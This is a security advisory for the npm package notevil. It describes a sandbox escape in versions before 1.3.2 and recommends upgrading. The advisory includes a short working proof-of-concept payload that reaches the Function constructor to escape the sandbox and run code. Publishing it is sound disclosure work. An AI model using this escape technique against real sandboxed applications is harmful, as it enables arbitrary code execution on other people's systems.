GHSA-7r5f-7qr4-pf6q

Suggest an improvement
Source
https://github.com/advisories/GHSA-7r5f-7qr4-pf6q
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-7r5f-7qr4-pf6q/GHSA-7r5f-7qr4-pf6q.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-7r5f-7qr4-pf6q
Published
2020-09-03T19:03:33Z
Modified
2020-08-31T18:47:00Z
Summary
Sandbox Breakout / Arbitrary Code Execution in notevil
Details

Versions of notevil prior to 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to prevent access to the Function constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the Sandbox Escape. An example payload is:

var safeEval = require('notevil')
var input = "" + 
"function fn() {};" + 
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" + 
"var properties = Object.values(constructorProperty);" + 
"properties.pop();" + 
"properties.pop();" + 
"properties.pop();" + 
"var Function = properties.pop();" + 
"(Function('return this'))()"; 
safeEval(input)```


## Recommendation

Upgrade to version 1.3.2 or later.
Database specific
{
    "cwe_ids":  [],
    "github_reviewed":  true,
    "github_reviewed_at":  "2020-08-31T18:47:00Z",
    "nvd_published_at":  null,
    "severity":  "HIGH"
}
References

Affected packages

npm / notevil

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
1.3.2

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-7r5f-7qr4-pf6q/GHSA-7r5f-7qr4-pf6q.json"